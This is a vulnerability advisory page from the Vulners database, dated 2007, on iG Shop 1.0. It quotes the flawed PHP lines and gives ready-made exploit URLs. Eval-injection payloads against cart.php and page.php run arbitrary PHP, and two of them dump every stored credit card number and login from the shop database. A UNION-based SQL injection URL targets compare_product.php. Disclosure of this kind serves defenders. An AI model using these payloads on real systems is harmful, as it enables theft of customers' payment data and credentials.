Vulners
Lucene search
iG Shop 1.0 (eval/sql injection) Multiple Remote Vulnerabilities
"If eval is the answer, then you are asking the wrong question."
--Unknowen
ig-shop suffers from two eval's that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");
http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//
./page.php line 336:
eval ("page_$action();");
Dumps all credit card numbers:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders
Some of these variables can be decoded using the unserlize() funciton.
Dumps all logins:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users
sql injection works regardless of magic_quotes_gpc.
http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks.
vendor's page:http://www.igeneric.co.uk/
By Michael Brooks.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1